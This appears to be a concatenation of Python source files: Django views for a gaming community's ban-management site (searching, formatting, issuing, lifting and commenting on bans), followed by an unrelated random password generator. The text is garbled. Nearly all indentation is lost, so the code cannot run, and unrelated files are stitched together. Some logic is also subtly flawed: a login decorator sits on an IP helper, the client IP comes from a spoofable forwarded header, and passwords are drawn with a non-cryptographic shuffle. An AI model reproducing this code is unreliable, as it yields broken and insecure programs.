messages.warning(request, _("This user's STEAM account is not linked to a Thicc Gaming Account."))
if count == 0:
messages.warning(request, _("This user has no previous bans."))
return render(request, 'bans/ban_search.html')
else:
            paginator = Paginator(bans, 16)  # Show 16 bans per page.
page = request.GET.get('page')
try:
bans = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
bans = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
bans = paginator.page(paginator.num_pages)
current_url = request.get_full_path()
if '&' in current_url:
current_url = current_url[:current_url.index('&')]
for ban in bans:
parseBan(ban)
return render(request, 'bans/ban_search.html', {'bans': bans,
'count': count,
# 'name': name,
'full_path': current_url,
'unban_form': unban_form,
'reban_form': reban_form,
'comment_form': comment_form,})
def parseBan(ban):
# Set the ban's respective user
ban.steam3 = commid_to_steam3(ban.authid)
ban.steamID = commid_to_steamid(ban.authid)
try:
socialAuthUserID = UserSocialAuth.objects.get(uid=ban.authid).user_id
ban.user = Profile.objects.get(user_id=socialAuthUserID)
except UserSocialAuth.DoesNotExist:
ban.nouser = "STEAM account not linked to a Thicc Gaming account."
# Format the ban's length
c = ban.length
days = int(c / 86400)
hours = int(c / 3600) % 24
minutes = int(c / 60) % 60
seconds = int(c % 60)
if days != 0 and hours != 0 and minutes != 0:
ban.length = "{} d, {} hr, {} min".format(days, hours, minutes)
elif days != 0 and hours != 0:
ban.length = "{} d, {} hr".format(days, hours)
elif days != 0:
ban.length = "{} d".format(days)
elif hours != 0 and minutes != 0:
ban.length = "{} hr, {} min".format(hours, minutes, seconds)
elif hours != 0:
ban.length = "{} hr".format(hours)
elif minutes != 0 and seconds != 0:
ban.length = "{} min, {} sec".format(minutes, seconds)
elif minutes != 0:
ban.length = "{} min".format(minutes)
elif seconds != 0:
ban.length = "{} sec".format(seconds)
else:
ban.length = "Permanent"
# Get the datetime of the created and end epochs
ban.createdDate = time.strftime('%m-%d-%Y %H:%M:%S', time.localtime(ban.created))
ban.endDate = time.strftime('%m-%d-%Y %H:%M:%S', time.localtime(ban.ends))
# Get the total bans for the user
ban.totalBans = Ban.objects.filter(authid=ban.authid).count()
# Set ban's respective admin forum-profile.
if ban.aid != 0:
try:
ban.adminUser = Profile.objects.get(user_id=ban.aid)
except Profile.DoesNotExist:
ban.adminUser = ""
# Set ban's expired state.
if ban.ends < int(time.time()) and ban.length != "Permanent":
ban.expired = True
else:
ban.expired = False
# Set ban's game.
if ban.sid == 1:
ban.game = "Left 4 THICC 2"
ban.topic = 16
elif ban.sid == 2:
ban.game = "THICC | ZS"
ban.topic = 16
elif ban.sid == 3:
ban.game = "thicc Scape"
ban.topic = 16
elif ban.sid == 4:
ban.game = "THICC | JB"
ban.topic = 16
elif ban.sid == 5:
ban.game = "THICC WoW"
ban.topic = 16
else:
ban.game = "Thicc Scape"
ban.topic = 16
if ban.RemoveType == 'U':
ban.unbanned = True
ban.RemovedOn = time.strftime('%m-%d-%Y %H:%M:%S', time.localtime(ban.RemovedOn))
try:
ban.unbannedAdmin = Profile.objects.get(user_id=ban.RemovedBy)
except Profile.DoesNotExist:
ban.unbannedAdmin = "Admin has since been removed."
# Get this ban's comments
ban.commentss = Comment.objects.filter(ban=ban)
if ban.commentss.count() == 0:
ban.commentss = False
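# Worked example of the length formatting used in parseBan above; this helper
# is hypothetical, not called by any view, and exists only to make the
# seconds-to-units arithmetic concrete.
def _format_length_example():
    c = 90061                      # 1 day + 1 hour + 1 minute + 1 second
    days = int(c / 86400)          # -> 1
    hours = int(c / 3600) % 24     # -> 1
    minutes = int(c / 60) % 60     # -> 1
    return "{} d, {} hr, {} min".format(days, hours, minutes)  # "1 d, 1 hr, 1 min"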
@login_required
def unban(request, bid):
ban = get_object_or_404(Ban, bid=bid)
if request.method == 'POST':
if not request.user.is_superuser:
# messages.error(request, "You are not a staff member. This action has been logged.")
return HttpResponseRedirect(reverse('bans:index'))
else:
# ban = get_object_or_404(Ban, bid=bid)
form = UnbanForm(request.POST, instance=ban)
if form.is_valid():
ban = form.save(commit=False)
ban.RemovedBy = request.user.id
ban.RemovedOn = time.time()
ban.RemoveType = 'U'
ban.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('bans:index'))
@login_required
def get_client_ip(request):
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
@login_required
def ban(request):
if request.user.is_authenticated and request.user.is_staff:
if request.method == "POST":
form = BanForm(request.POST)
if form.is_valid():
ban = form.save(commit=False)
ban.aid = request.user.id
ban.created = int(time.time())
ban.ends = ban.created + ban.length
ban.adminIp = get_client_ip(request)
ban.RemovedBy = 0
ban.RemovedOn = 0
ban.type = 0
ban.save()
messages.success(request, "Ban successfully added.")
else:
return render(request, 'bans/ban_details.html', {'form': form})
else:
form = BanForm()
return render(request, 'bans/ban_details.html', {'form':form})
else:
form = BanForm()
return render(request, 'bans/ban_details.html', {'form':form})
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('bans:index'))
@login_required
def comment(request, bid):
if request.user.is_authenticated and request.user.is_staff:
ban = get_object_or_404(Ban, bid=bid)
if request.method == 'POST':
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.ban = ban
comment.commenter= request.user
comment.created = int(time.time())
comment.ip = get_client_ip(request)
comment.save()
messages.success(request, "Comment successfully added.")
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('bans:index'))
@login_required
def reban(request, bid):
if request.user.is_authenticated and request.user.is_staff:
ban = get_object_or_404(Ban, bid=bid)
if request.method == 'POST':
form = RebanForm(request.POST)
if form.is_valid():
newban = form.save(commit=False)
newban.name = ban.name
newban.authid = ban.authid
newban.uid = 0
newban.created = int(time.time())
newban.ends = newban.created + newban.length
newban.aid = request.user.id
newban.adminip = get_client_ip(request)
newban.sid = ban.sid
newban.type = 0
newban.RemovedBy = 0
newban.RemovedOn = 0
if ban.ip:
newban.ip = ban.ip
newban.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('bans:index'))
|
import string
import random
s1 = string.ascii_lowercase
s2 = string.ascii_uppercase
s3 = string.digits
s4 = string.punctuation
s = []
s.extend(s1)
s.extend(s2)
s.extend(s3)
s.extend(s4)
while True:
plen = int(input("Enter Length Of Password: "))
random.shuffle(s)
password = s[0:plen]
print("Your Password Is: ",end="")
print("".join(password))
|